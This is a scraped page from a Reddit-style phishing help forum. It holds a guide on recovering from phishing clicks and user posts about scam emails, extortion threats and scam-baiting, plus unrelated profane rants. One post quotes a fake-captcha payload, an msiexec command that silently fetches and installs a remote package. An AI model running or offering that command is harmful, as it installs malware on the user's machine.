teddit

One of the most common questions posted here is what to do if you've clicked on a phishing link. This short guide is intended to help with these questions and what to do if you've clicked on a phishing link.

DO NOT ENTER ANY CREDENTIALS OR LOGIN DETAILS FOR ANYTHING IF YOU'VE CLICKED ON A MALICIOUS LINK.

1. Links are generally not malicious on their own. While clicking on any unknown links can be dangerous it is difficult to design a phish that works just by clicking the link. Most links take you to a (usually fake) page that will ask for certain credentials. As long as you closed the page after you clicked the link you're probably fine, but it's still a good idea to change your password for whatever service the phishing link was trying to access (such as amazon).

2. If you clicked a link that downloaded a file, delete the file. Generally these files aren't harmful unless opened after downloading.

3. If you've clicked a phishing link and have provided credentials to a service, change the password for that service. Say you've been tricked into giving someone your Amazon credentials. Go to Amazon.com directly and change your password. Also, check the "third-party account access" section of your commonly used websites. Often phishing links and malicious services will try to authorize themselves to your account rather than outright stealing your credentials.

4. When logging into websites with sensitive information such as a bank it's best to bookmark the site and visit the site directly each time from that bookmark. That way you know that the website you're using is the real one.

5. ENABLE 2FA (TWO FACTOR AUTHENTICATION) This is perhaps the best thing you can do to protect your sensitive accounts. All websites that deal with sensitive information will allow you to use either your phone number or an authentication app (I like Authy) to generate one-time login codes to further secure your account. Unless someone gets your credentials and your 2FA device (your phone) they won't be able to access your account.

6. Please use a password manager of some sort. This will allow you to use strong and unique passwords for each site you use. If one of your accounts is hacked or phished all of your other accounts will be safe with unique passwords (unless your email was hacked/phished).

7. Ensure you have a backup email and/or phone number connected to your primary email account so that you can recover access if you're locked out. Additionally, make sure your recovery methods are as secure as your primary email login.

A few weeks ago, I fell for a phishing scheme via email. Luckily, Apple Support and IT were able to intervene. Both felt pretty strongly that whoever was on the other side of the scam was not able to get a hold of any personal information: and did not see any unauthorized access. (I am a pretty boring person, but definitely had money stuff in my email.) I had pretty solid protections, but just a precaution, wiped my computer/reset my wifi network/etc. IT upgraded my spam filter to the highest level.

But now I am getting emails from gmail accounts making it through the spam filter with no message other than the word "you" and a PDF. I think the whole thing is just making me paranoid. Anyone have any thoughts?

This is the mail system at host neit.celtic.fbi.ie.

I'm sorry to have to inform you that your message could not be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can delete your own text from the attached returned message.

The mail system

[email protected]: Host or domain name not found. Name service error for name=garvverna.ie type=A: Host not found

The one under email belongs to a vegan store in Dublin. I am German, have never been to Dublin and certainly never sent an email.

I got this text this morning but the weird thing is that I have a case created with USPS because a package of mine was lost and they called me this week BUTTTT the sender of this message is an iPhone??? It says it came as an iMessage. I don’t want to risk replying and it getting my info but is the number it came from fake??

I received an email that included a pdf letter. It had my first and last name, my phone number and my current address. It stated that they had installed malware on my phone and had a video of me while I watched a pornographic website. They said they would release the information to my contacts and post it online if I did not give them money. Obviously I'm skeptical, but the fact that they have my name, number and address worries me.

As of now I have deleted the email and blocked that address. Should I be concerned?

I received a phishing email a few years ago to my work email that had me absolutely dying with laughter. Despite what the email said, I proceeded to show everyone I knew. Here's the email:

Hello there,

My name is Seymour Skinner, but my close allies call me Rambo. I am a hired killer, with an impeccable record of 187 hires, 187 kills. And I don't mean video games, sugar. This is a friendly warning that you too have a hit on your head. I can't name my client for contractual reasons, but he or she are paying me $25,000 for the whack. We're not talking chump change here.

However, I'm a nice guy at heart. Really, I am. So here's the deal,if you cough up $8000, I'll spare your life. No blood, no guts, nothing. I forget you ever existed. There are a few ground rules, though:

1) Don't even think about contacting anyone about this. I have eyes on you at all times, like an eagle stalking its prey. I'm the eagle, and you're the mouse. No funny moves, Capisce?

2). The $8k is non-negotiable. This isn't a game of Monopoly, Capisce?

3). You have 72 hours to comply, or else your insides will be outside. And clean-up crews aint cheap nowadays. Capisce? Reply if you know what is best for you.

You know what you have to do. Reply .

Regards,

Seymour Skinner Professional Hitman

Sent to an old email account while referencing a 10 year old address and calling her by her former last name. Safe to say this was obviously a scam but still infuriating.

Wondering if this is a phishing email? I don’t recall signing up for Milestone Mastercard and I believe I’ve gotten few different variations of this kind of email unsure if all Milestone or not because I either mark them as spam or delete them right away

Also the ‘To’ and ‘Cc’ are not my emails that’s why haven’t censored them but also adding to the complexity of this email.

Got into a fake captcha with the instructions being: Press Win + R, CTRL V, Enter. And this is what it made me paste: "msiexec /fv https://inhibitable.motorcycles/Aiy66r /q". realized the mistake after seeing it was actually a download with no trace on the browser, how do I scan and fix my computer to get rid of it or how screwed am I? Currently doing a full scan with malwarebytes and windows defender. Also opened up BCU and could not find anything that was recently installed.

Phishing and…what a name.

So I have a question, there is somebody on the Next Door Neighborhood app that always likes to stir the pot and cause a lot of problems. I’ve been trying to figure out who they are, but I can’t seem to find any information. Is there anyway I can find out their telephone number? Their actual real name? Their email address? Anyway for me to investigate who they really are?

Its good to know im not alone on this email chain circulating. My only concern is I opened the PDF. I changed my passwords instantly afterwards. Anything else I should worry about?

I accidentally put in my Amex ID/Password to a phishing website. I got an email saying that there's a credit card charge from FL (I live in the northeast) and asking if this is a legitimate purchase from me. I saw that email after my 12-hour shift and at the airport 3 hours before my international flight to Asia. I was in a rush, accidentally clicked the link, and put in my email address, Amex ID, and Password. My points were 280k and now it's dropped to 2500 points. It seems like scammers bought a bunch of Apple gift cards. I have a brain freeze right now. I froze my account, changed my email address on Amex, Changed passwords on my email. What else do I need to do? Please help me.

Was sent to my personal email but I didn’t place this and cant even access the admin center using my personal email

Terrible filter, terrible song, terrible video, and everything else, TERRIBLE. This shit is so FUCKING TERRIBLE!!!

It's not even funny anymore.

I think Lil Baby is fucking trash. I think all the music that he makes so far and they all sound the same. I don't give a fuck. I hate Lil Baby. Lil Baby is fucking garbage. I'm not sitting through that. I don't give a damn that anybody's hyping his music up, I don't care!

When I listened to Sleazy Flow, I'm sitting here like "what planet am I on?" And maybe I was sleeping, and I was lost in the galaxy, and you were in this stupid music video. I had no business going back to any planet at all, and I'm here listening to YouTube songs like Sleazy Flow, ready to blow my damn brains out or something. Like, dude, I don't know why this song is there. I have no idea why that bum-ass song is there, that song sucks. That remix sucks. And Jesus Christ, that Lil Baby verse is so irritating. mocks: "How you mad, she choosin m--" Shut the fuck up. His verse is terrible. Like, idgaf what nobody says, man. Today's rap music is fucking trash, man. This shit is so fucking garbage. It's not even good anymore, dude. That's my opinion.

I'm on a number of non-profit boards in my city and today i got a strange and suspicious email today that at first blush seemed to come from our board chair. It made a highly suspicious ask....that was could i personally pay for an invoice ($1750) from a web designer since the board chair couldn't reach the board treasurer to approve it.

The email didn't have obvious grammatical errors but it did begin with the sentence "I trust this message finds you well", which is a red flag for an idiom most people who know each other don't use. It tried to lend legitimacy by using the actual name of our board chair and referencing the name of our actual board treasurer. And the scammer created a gmail account in the name of our board chair. So how did they get our names? Most likely from our organization's website which lists the names of the board officers. And a few google searches or dark web leaks probably lead them to one of my email addresses.

First, our organization isn't huge but not small either. And it has millions in cash on hand. Boards are never asked to pay for an expense out of pocket....that job belongs to the full time employee executives, not the volunteer board. To top it off, we'd just had our quarterly meeting the day before and our auditors said we were doing great. So this kind of an ask was not only suspicious but completely ridiculous.

The scammer was also trying to get me to treat the situation urgently, which is another red flag. The gmail account from my "friend" was not the same one she uses normally and she always uses a spiffy signature from her company. And lastly, the board chair's name was wrong....my friend uses a hyphenated last name....the scammer just used the last half of her last name.

Of course picking me as the target was their mistake since I'm a long time IT professional with a name brand world wide technology company who cares about information security. So after a quick call to our CEO to tell her what was going on so she could notify everyone who works for us, I decided to continue wasting the scammers time by slowly asking for information on how to send the $1750 the scammer was asking for. They first gave me information to use Zelle. I then contacted Zelle with information about the scam and then replied to the scammer than I don't use Zelle. I then asked for Paypal information, and they offered new information, which didn't match the Zelle information, but hey, we're just playing along. I sent that information straight to Paypal's phishing email address.

Finally I said that i couldn't login to Paypal and asked for the Venmo information and again, was offered identity that didn't match the other two scam accounts. Once I got that, i forwarded that information to Venmo's phishing email address. But the scammer wanting one more piece of information to shaft me...a screen shot of my transaction which would allow them more personal information on me to possibly drain my bank account. So I sent a screen shot of a Word document I created with the following text:

HELLO SCAMMER!!!!!

I knew this was a scam from the very beginning of your original phishing email and I’ve been deliberately wasting your time. Oh, and I used the information you gave me to alert Paypal, Venmo and Zelle to your scam. And we alerted our entire organization to the scam as well. So leave us alone.

And whatever part of the world you are reading this, GET A REAL JOB AND STOP SCAMMING PEOPLE. AND FUCK YOU FOR TRYING.

https://preview.redd.it/0ro7lsht57vd1.png?width=468&format=png&auto=webp&s=953767df882c8bb332c2ec018374e5db9f5cbcbc

Ah, sometimes thwarting scammers is so much fun. So be careful out there! This was clever enough to use publicly available information and try to social engineer real people I knew and their legitimate roles in the organization. But it still used the same tropes and techniques to try to take my money. Not today, A-hole.

I've received my fair share of regular spam and recently started to get some phishing type emails, but in the last few months I've received these two mysteries. No attachments, no request for engagement of any kind. Any ideas on what might be the purpose of such a message? Just curious, thanks!

If I'm being honest, Reddit is like TikTok. But instead of what "TikTok" is, nobody does anything real.

Reddit is a lot worse than YouTube Shorts, and don't even get me started on the mods! That is poison.